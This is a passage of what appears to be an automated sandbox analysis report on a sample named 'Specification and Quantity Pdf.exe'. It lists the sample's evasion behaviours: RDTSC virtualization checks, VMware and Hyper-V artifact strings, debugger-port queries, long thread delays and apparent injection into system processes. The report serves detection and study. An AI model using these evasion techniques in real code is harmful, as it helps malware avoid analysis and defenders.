Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4

Tries to detect virtualization through RDTSC time measurements

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 349904 second address: 34990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 349B7E second address: 349B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Memory allocated: 26984690000 memory reserve | memory write watch

Jump to behavior

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4583	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5240	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 730	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9215	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 889	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 866	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1456	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 8511	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-29707

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API coverage: 2.3 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 2.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5260	Thread sleep count: 730 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5260	Thread sleep time: -1460000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5260	Thread sleep count: 9215 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5260	Thread sleep time: -18430000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8180	Thread sleep time: -2912000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8180	Thread sleep time: -17022000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe

Code function: 0_2_00007FF773C61460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF773C61460

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000008.00000002.3749514616.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000008.00000002.3757784608.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000008.00000003.2275911834.0000000007314000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: Specification and Quantity Pdf.exe, 00000000.00000002.1308793083.0000026984514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Specification and Quantity Pdf.exe, 00000000.00000002.1308793083.0000026984514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000008.00000000.1323539837.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000008.00000003.3081808656.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000008.00000002.3757784608.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1323539837.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000008.00000000.1323539837.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000008.00000003.2275911834.0000000007314000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000008.00000000.1323539837.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081808656.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3757784608.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000008.00000002.3752127425.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000008.00000002.3749514616.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000003.3081808656.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000002.3749514616.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_00E925B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

10_2_00E925B2

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382E388 mov eax, dword ptr fs:[00000030h]	6_2_0382E388
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382E388 mov eax, dword ptr fs:[00000030h]	6_2_0382E388
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382E388 mov eax, dword ptr fs:[00000030h]	6_2_0382E388
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385438F mov eax, dword ptr fs:[00000030h]	6_2_0385438F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385438F mov eax, dword ptr fs:[00000030h]	6_2_0385438F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390539D mov eax, dword ptr fs:[00000030h]	6_2_0390539D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0388739A mov eax, dword ptr fs:[00000030h]	6_2_0388739A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0388739A mov eax, dword ptr fs:[00000030h]	6_2_0388739A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03828397 mov eax, dword ptr fs:[00000030h]	6_2_03828397
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03828397 mov eax, dword ptr fs:[00000030h]	6_2_03828397
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03828397 mov eax, dword ptr fs:[00000030h]	6_2_03828397
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038533A5 mov eax, dword ptr fs:[00000030h]	6_2_038533A5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038633A0 mov eax, dword ptr fs:[00000030h]	6_2_038633A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038633A0 mov eax, dword ptr fs:[00000030h]	6_2_038633A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EC3CD mov eax, dword ptr fs:[00000030h]	6_2_038EC3CD
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0383A3C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0383A3C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0383A3C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0383A3C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0383A3C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0383A3C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]	6_2_038383C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]	6_2_038383C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]	6_2_038383C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038383C0 mov eax, dword ptr fs:[00000030h]	6_2_038383C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EB3D0 mov ecx, dword ptr fs:[00000030h]	6_2_038EB3D0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF3E6 mov eax, dword ptr fs:[00000030h]	6_2_038EF3E6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039053FC mov eax, dword ptr fs:[00000030h]	6_2_039053FC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038403E9 mov eax, dword ptr fs:[00000030h]	6_2_038403E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0384E3F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0384E3F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0384E3F0
